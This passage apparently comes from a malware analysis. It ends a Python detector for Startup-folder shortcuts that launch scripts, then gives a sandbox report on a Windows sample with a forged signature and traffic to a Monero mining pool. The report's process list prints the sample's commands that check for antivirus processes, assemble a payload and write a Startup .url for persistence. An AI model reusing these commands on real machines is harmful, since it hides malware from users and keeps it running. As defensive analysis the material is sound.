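    target = parse_url_shortcut(text).get("internetshortcut", {}).get("url", "")
    target = target.strip().strip('"').strip()
    if target.lower().startswith("file:"):
        target = target[5:].lstrip("/").replace("/", "\\")
    return target


def local_script_target(text: str):
    """Return the script extension when the target is a local or UNC path to a script, else None."""
    target = shortcut_target(text)
    if not (re.match(r"^[A-Za-z]:\\", target) or target.startswith("\\\\")):
        return None
    ext = ntpath.splitext(target)[1].lower()
    return ext if ext in SCRIPT_EXTENSIONS else None


def scan(entries):
    """entries: iterable of (shortcut path, file text), e.g. gathered with os.walk over the
    per-user and all-users Startup folders; yields (path, target, extension) for each hit."""
    for path, text in entries:
        ext = local_script_target(text)
        if ext:
            yield path, shortcut_target(text), ext


if __name__ == "__main__":
    for hit in scan([("dropped.url", DROPPED_SHORTCUT), ("benign.url", BENIGN_SHORTCUT),
                     ("uri.url", FILE_URI_SHORTCUT)]):
        print("script shortcut:", hit)
```

The quotes around the path in the dropped file are kept in the parsed value and only stripped when resolving the target, so a rule that compares raw values still sees the file as written.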
                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):7.99708308920727
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:file.exe
                                                                                                    File size:4'389'991 bytes
                                                                                                    MD5:978752b65601018ddd10636b648b8e65
                                                                                                    SHA1:2c0e320cb0d84c6760a925d873d58e701e3e6cb1
                                                                                                    SHA256:8bf64a9906e8177eab206dac3a550bc5918213659f98eac6295b8e24184eb782
                                                                                                    SHA512:f29382d1c14cff16ee09febc5e3c875580de84494ba0510fcae06a1e024ffd00c96d3e962d2da2132ebd864d085218c79979c1df7f3334ea2e26b5ed39cbdbe1
                                                                                                    SSDEEP:98304:WjqOA3rPgnbbKrWFkr+aROuqoq8xT3SNCROnLm8F2Eq3VVP6Mj6jP:4rA3rPCKrv7Ouq5qDwCgLdF2EcVVP6mc
                                                                                                    TLSH:3716330598340DB5FF9601F0ADFBD789E869F8305B10CBD8771884E1FA996E6B179B02
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                    Icon Hash:4cb6e64dda6666d6
                                                                                                    Entrypoint:0x4038af
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:true
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:5
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:5
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:5
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:be41bf7b8cc010b614bd36bbca606973
Signature Valid:false
Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232 (HRESULT 0x80096010, TRUST_E_BAD_DIGEST: the file hash recorded in the Authenticode signature does not match the file's contents, so the binary was modified after it was signed or carries a certificate table taken from another file; the NVIDIA Corporation subject below therefore says nothing about who produced this sample)
Not Before, Not After
• Not Before: 12/01/2023 19:00:00, Not After: 16/01/2026 18:59:59
                                                                                                    Subject Chain
                                                                                                    • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                    Version:3
                                                                                                    Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                    Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                    Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                    Serial:0997C56CAA59055394D9A9CDB8BEEB56
                                                                                                    Instruction
                                                                                                    sub esp, 000002D4h
                                                                                                    push ebx
                                                                                                    push ebp
                                                                                                    push esi
                                                                                                    push edi
                                                                                                    push 00000020h
                                                                                                    xor ebp, ebp
                                                                                                    pop esi
                                                                                                    mov dword ptr [esp+18h], ebp
                                                                                                    mov dword ptr [esp+10h], 0040A268h
                                                                                                    mov dword ptr [esp+14h], ebp
                                                                                                    call dword ptr [00409030h]
                                                                                                    push 00008001h
                                                                                                    call dword ptr [004090B4h]
                                                                                                    push ebp
                                                                                                    call dword ptr [004092C0h]
                                                                                                    push 00000008h
                                                                                                    mov dword ptr [0047EB98h], eax
                                                                                                    call 00007FAED09C6B4Bh
                                                                                                    push ebp
                                                                                                    push 000002B4h
                                                                                                    mov dword ptr [0047EAB0h], eax
                                                                                                    lea eax, dword ptr [esp+38h]
                                                                                                    push eax
                                                                                                    push ebp
                                                                                                    push 0040A264h
                                                                                                    call dword ptr [00409184h]
                                                                                                    push 0040A24Ch
                                                                                                    push 00476AA0h
                                                                                                    call 00007FAED09C682Dh
                                                                                                    call dword ptr [004090B0h]
                                                                                                    push eax
                                                                                                    mov edi, 004CF0A0h
                                                                                                    push edi
                                                                                                    call 00007FAED09C681Bh
                                                                                                    push ebp
                                                                                                    call dword ptr [00409134h]
                                                                                                    cmp word ptr [004CF0A0h], 0022h
                                                                                                    mov dword ptr [0047EAB8h], eax
                                                                                                    mov eax, edi
                                                                                                    jne 00007FAED09C411Ah
                                                                                                    push 00000022h
                                                                                                    pop esi
                                                                                                    mov eax, 004CF0A2h
                                                                                                    push esi
                                                                                                    push eax
                                                                                                    call 00007FAED09C64F1h
                                                                                                    push eax
                                                                                                    call dword ptr [00409260h]
                                                                                                    mov esi, eax
                                                                                                    mov dword ptr [esp+1Ch], esi
                                                                                                    jmp 00007FAED09C41A3h
                                                                                                    push 00000020h
                                                                                                    pop ebx
                                                                                                    cmp ax, bx
                                                                                                    jne 00007FAED09C411Ah
                                                                                                    add esi, 02h
                                                                                                    cmp word ptr [esi], bx
                                                                                                    Programming Language:
                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                    • [ C ] VS2010 SP1 build 40219
                                                                                                    • [RES] VS2010 SP1 build 40219
                                                                                                    • [LNK] VS2010 SP1 build 40219
Name                                  Virtual Address   Virtual Size   Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0               0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xac40            0xb4           .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x100000          0x1993e        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0               0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x42d63f          0x2628         (file offset, not in a section)
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x86000           0x994          .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0               0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0               0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0               0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0               0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0               0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0               0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x9000            0x2d0          .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0               0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0               0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0               0x0
The SECURITY entry is a raw file offset rather than an RVA, which is why it maps to no section: 0x42d63f + 0x2628 = 4'389'991 bytes, exactly the reported file size, so the Authenticode certificate table is the last thing in the file.
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x100000 | 0x1993e | 0x19a00 | 9489d090ecf077e17eb90ebf64e83539 | False | 0.9276200457317073 | data | 7.720164356286416 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x11a000 | 0xfd6 | 0x1000 | 63f44dc7ce4332517505661bf812c553 | False | 0.59423828125 | data | 5.570368511133667 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x100280 | 0x1114d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004144929607661
RT_ICON | 0x1113d0 | 0x233a | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 0.9780439121756487
RT_ICON | 0x11370c | 0x208c | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0013202112337973
RT_ICON | 0x115798 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.5310211554109032
RT_ICON | 0x117e00 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.6493624772313297
RT_ICON | 0x118f28 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.7606382978723404
RT_DIALOG | 0x119390 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x119490 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x1195ac | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x11960c | 0x5a | Targa image data - Map 32 x 4429 x 1 +1 | English | United States | 0.7888888888888889
RT_MANIFEST | 0x119668 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 24, 2024 20:25:27.207014084 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Nov 24, 2024 20:25:27.326533079 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:25:27.326606035 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Nov 24, 2024 20:25:27.326998949 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Nov 24, 2024 20:25:27.446624041 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:25:28.669364929 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:25:28.669419050 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:25:28.671336889 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Nov 24, 2024 20:25:28.671336889 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Nov 24, 2024 20:25:28.797566891 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:25:29.094172955 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:25:29.136995077 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Nov 24, 2024 20:25:29.347130060 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:25:29.402606964 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Nov 24, 2024 20:25:31.418621063 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:25:31.465131044 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Nov 24, 2024 20:25:41.341468096 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:25:41.465133905 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Nov 24, 2024 20:25:51.499468088 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:25:51.543432951 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Nov 24, 2024 20:26:01.434472084 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:26:01.480787992 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Nov 24, 2024 20:26:11.500020027 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:26:11.543309927 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Nov 24, 2024 20:26:15.213450909 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:26:15.262029886 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Nov 24, 2024 20:26:25.157396078 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:26:25.199533939 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Nov 24, 2024 20:26:35.202073097 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:26:35.246701002 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Nov 24, 2024 20:26:45.245049953 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:26:45.293359995 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Nov 24, 2024 20:26:55.234812021 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:26:55.277704000 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Nov 24, 2024 20:27:05.241915941 CET | 10343 | 49735 | 163.172.171.111 | 192.168.2.5
Nov 24, 2024 20:27:05.293334007 CET | 49735 | 10343 | 192.168.2.5 | 163.172.171.111
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 24, 2024 20:25:03.902481079 CET | 62197 | 53 | 192.168.2.5 | 1.1.1.1
Nov 24, 2024 20:25:04.154067993 CET | 53 | 62197 | 1.1.1.1 | 192.168.2.5
Nov 24, 2024 20:25:17.464598894 CET | 58096 | 53 | 192.168.2.5 | 1.1.1.1
Nov 24, 2024 20:25:17.602181911 CET | 53 | 58096 | 1.1.1.1 | 192.168.2.5
Nov 24, 2024 20:25:27.060687065 CET | 49929 | 53 | 192.168.2.5 | 1.1.1.1
Nov 24, 2024 20:25:27.204521894 CET | 53 | 49929 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 24, 2024 20:25:03.902481079 CET | 192.168.2.5 | 1.1.1.1 | 0x1f38 | Standard query (0) | DqnJUgbSFuO.DqnJUgbSFuO | A (IP address) | IN (0x0001) | false
Nov 24, 2024 20:25:17.464598894 CET | 192.168.2.5 | 1.1.1.1 | 0x1f91 | Standard query (0) | DqnJUgbSFuO.DqnJUgbSFuO | A (IP address) | IN (0x0001) | false
Nov 24, 2024 20:25:27.060687065 CET | 192.168.2.5 | 1.1.1.1 | 0x7c4b | Standard query (0) | xmr-eu2.nanopool.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 24, 2024 20:25:04.154067993 CET | 1.1.1.1 | 192.168.2.5 | 0x1f38 | Name error (3) | DqnJUgbSFuO.DqnJUgbSFuO | none | none | A (IP address) | IN (0x0001) | false
Nov 24, 2024 20:25:17.602181911 CET | 1.1.1.1 | 192.168.2.5 | 0x1f91 | Name error (3) | DqnJUgbSFuO.DqnJUgbSFuO | none | none | A (IP address) | IN (0x0001) | false
Nov 24, 2024 20:25:27.204521894 CET | 1.1.1.1 | 192.168.2.5 | 0x7c4b | No error (0) | xmr-eu2.nanopool.org | | 163.172.171.111 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 20:25:27.204521894 CET | 1.1.1.1 | 192.168.2.5 | 0x7c4b | No error (0) | xmr-eu2.nanopool.org | | 51.210.150.92 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 20:25:27.204521894 CET | 1.1.1.1 | 192.168.2.5 | 0x7c4b | No error (0) | xmr-eu2.nanopool.org | | 51.195.138.197 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 20:25:27.204521894 CET | 1.1.1.1 | 192.168.2.5 | 0x7c4b | No error (0) | xmr-eu2.nanopool.org | | 51.68.137.186 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 20:25:27.204521894 CET | 1.1.1.1 | 192.168.2.5 | 0x7c4b | No error (0) | xmr-eu2.nanopool.org | | 51.15.89.13 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 20:25:27.204521894 CET | 1.1.1.1 | 192.168.2.5 | 0x7c4b | No error (0) | xmr-eu2.nanopool.org | | 51.195.43.17 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 20:25:27.204521894 CET | 1.1.1.1 | 192.168.2.5 | 0x7c4b | No error (0) | xmr-eu2.nanopool.org | | 51.15.61.114 | A (IP address) | IN (0x0001) | false

                                                                                                    Target ID:0
                                                                                                    Start time:14:24:56
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:4'389'991 bytes
                                                                                                    MD5 hash:978752B65601018DDD10636B648B8E65
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:2
                                                                                                    Start time:14:24:57
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd
                                                                                                    Imagebase:0x790000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:3
                                                                                                    Start time:14:24:57
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:14:25:00
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:tasklist
                                                                                                    Imagebase:0x710000
                                                                                                    File size:79'360 bytes
                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:5
                                                                                                    Start time:14:25:00
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:findstr /I "wrsa opssvc"
                                                                                                    Imagebase:0xee0000
                                                                                                    File size:29'696 bytes
                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:6
                                                                                                    Start time:14:25:00
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:tasklist
                                                                                                    Imagebase:0x710000
                                                                                                    File size:79'360 bytes
                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:7
                                                                                                    Start time:14:25:00
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                    Imagebase:0xee0000
                                                                                                    File size:29'696 bytes
                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:8
                                                                                                    Start time:14:25:01
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c md 29442
                                                                                                    Imagebase:0x790000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:9
                                                                                                    Start time:14:25:01
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l
                                                                                                    Imagebase:0x790000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:10
                                                                                                    Start time:14:25:01
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:Reynolds.com l
                                                                                                    Imagebase:0x7ff7aa0f0000
                                                                                                    File size:1'065'128 bytes
                                                                                                    MD5 hash:C63860691927D62432750013B5A20F5F
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:11
                                                                                                    Start time:14:25:02
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\choice.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:choice /d y /t 5
                                                                                                    Imagebase:0x500000
                                                                                                    File size:28'160 bytes
                                                                                                    MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:12
                                                                                                    Start time:14:25:02
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit
                                                                                                    Imagebase:0x7ff6f0af0000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:13
                                                                                                    Start time:14:25:02
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
